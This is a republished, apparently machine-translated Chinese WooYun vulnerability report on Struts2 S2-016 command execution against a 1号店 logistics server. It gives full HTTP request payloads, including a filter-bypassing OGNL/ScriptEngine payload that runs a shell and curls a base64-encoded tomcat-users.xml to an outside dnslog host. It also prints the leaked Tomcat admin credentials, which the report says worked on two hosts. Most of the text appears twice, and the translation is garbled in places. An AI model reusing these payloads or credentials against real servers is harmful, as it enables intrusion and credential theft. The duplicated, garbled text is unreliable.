1号店某系统st2命令执行(防护绕过)
漏洞标题 1号店某系统st2命令执行(防护绕过) 相关厂商 1号店 漏洞作者 loopx9 提交时间 2016-05-11 11:38 公开时间 2016-06-25 12:30 漏洞类型 命令执行 …
漏洞标题
1号店铺系统st2命令执行(保护旁路)
相关制造商
1号店
漏洞作者
Loopx9
提交时间
2016-05-11 11: 38
公共时间
2016-06-25 12: 30
漏洞类型
命令执行
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
补丁不及时,远程命令执行
漏洞详细信息
@ lijiejie的WooYun:腾讯移动端的一个功能SSRF可以探索/漫游内网(cloudeye artifact case)提到两个url跳转,乍一看它是s2-016命令执行。
http://tms2.yihaodian.com/system/login_login.action?redirect:http://admin.soso.com
http://3pl.yihaodian.com/system/login_login.action?redirect:http://10.187.10.218
Tms2.yihaodian.com似乎已修复,但3pl.yihaodian.com尚未修复。
POST /system/login_view.action HTTP/1.1
用户代理: curl/7.33.0
主机: 3pl.yihaodian.com
接受: */*
代理连接:保持活动状态
内容长度: 196
内容类型: multipart/form-data;边界=------------------------ 4a606c052a893987
-------------------------- 4a606c052a893987
Content-Disposition: form-data; name='redirect: $ {#application.get('javax.servlet.context.tempdir')}'
-1
-------------------------- 4a606c052a893987--
在测试期间,发现某些字符被过滤,并且无法显示“java.lang”。
更改了一个exp,使用java scriptengine来调用java方法:
POST /system/login_view.action HTTP/1.1
用户代理: curl/7.33.0
主机: 3pl.yihaodian.com
接受: */*
代理连接:保持活动状态
内容长度: 396
内容类型: multipart/form-data;边界=------------------------ 4a606c052a893987
-------------------------- 4a606c052a893987
Content-Disposition: form-data; name='redirect: $ {new javax.script.ScriptEngineManager()。getEngineByName('js')。eval('new j \ u0061va.lang.ProcessBuilder ['(java.l \ u0061ng .String [])']( ['/bin/sh',' - c','curl xxoo.dnslog.info/$(cat/usr/local/tomcat6/conf/tomcat-users.xml|base64 -w 0)'])。start( )\ u003B ')}'
-1
-------------------------- 4a606c052a893987--
读取tomcat-users.xml以获取tomcat管理用户和密码并将其发送到clueye,接收请求如下:
漏洞证明:
Base64解码得到:
<xml version='1.0'coding='utf-8'?>
<! -
在一个或多个Apache软件基金会(ASF)下获得许可
贡献者许可协议。请参阅随附的NOTICE文件
这项工作有关版权所有权的其他信息。
ASF根据Apache许可证2.0版将此文件许可给您
('许可');除非符合规定,否则您不得使用此文件
许可证。您可以在以下位置获取许可证副本
http://www.apache.org/licenses/LICENSE-2.0
包括适用法律要求或书面同意的软件
根据许可证分发的“按现状”分发,
不附带任何明示或暗示的保证或条件。
有关管理权限的特定语言,请参阅许可证
许可证下的合规性。
- >
< Tomcat的用户>
< role rolename='manager'/>
< user username='monitor'password='OPS-monitoR'roights='manager'/>
<! -
< role rolename='tomcat'/>
< role rolename='role1'/>
< user username='tomcat'password='tomcat'roces='tomcat'/>
< user username='both'password='tomcat'roles='tomcat,role1'/>
< user username='role1'password='tomcat'roles='role1'/>
- >
</Tomcat的用户>
成功登录tomcat:
Tms2.yihaodian.com也配置了相同的用户名和密码,也成功登录:
修理计划:
。
版权声明:请注明出处loopx9 @乌云
在测试期间,发现某些字符被过滤,并且无法显示“java.lang”。
更改了一个exp,使用java scriptengine来调用java方法:
POST /system/login_view.action HTTP/1.1
用户代理: curl/7.33.0
主机: 3pl.yihaodian.com
接受: */*
代理连接:保持活动状态
内容长度: 396
内容类型: multipart/form-data;边界=------------------------ 4a606c052a893987
-------------------------- 4a606c052a893987
Content-Disposition: form-data; name='redirect: $ {new javax.script.ScriptEngineManager()。getEngineByName('js')。eval('new j \ u0061va.lang.ProcessBuilder ['(java.l \ u0061ng .String [])']( ['/bin/sh',' - c','curl xxoo.dnslog.info/$(cat/usr/local/tomcat6/conf/tomcat-users.xml|base64 -w 0)'])。start( )\ u003B ')}'
-1
-------------------------- 4a606c052a893987--
读取tomcat-users.xml以获取tomcat管理用户和密码并将其发送到clueye,接收请求如下:
漏洞证明:
Base64解码得到:
<xml version='1.0'coding='utf-8'?>
<! -
在一个或多个Apache软件基金会(ASF)下获得许可
贡献者许可协议。请参阅随附的NOTICE文件
这项工作有关版权所有权的其他信息。
ASF根据Apache许可证2.0版将此文件许可给您
('许可');除非符合规定,否则您不得使用此文件
许可证。您可以在以下位置获取许可证副本
http://www.apache.org/licenses/LICENSE-2.0
包括适用法律要求或书面同意的软件
根据许可证分发的“按现状”分发,
不附带任何明示或暗示的保证或条件。
有关管理权限的特定语言,请参阅许可证
许可证下的合规性。
- >
< Tomcat的用户>
< role rolename='manager'/>
< user username='monitor'password='OPS-monitoR'roights='manager'/>
<! -
< role rolename='tomcat'/>
< role rolename='role1'/>
< user username='tomcat'password='tomcat'roces='tomcat'/>
< user username='both'password='tomcat'roles='tomcat,role1'/>
< user username='role1'password='tomcat'roles='role1'/>
- >
</Tomcat的用户>
成功登录tomcat:
Tms2.yihaodian.com也配置了相同的用户名和密码,也成功登录:
修理计划:
。
版权声明:请注明出处loopx9 @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 508 )
- 分类:黑客技术
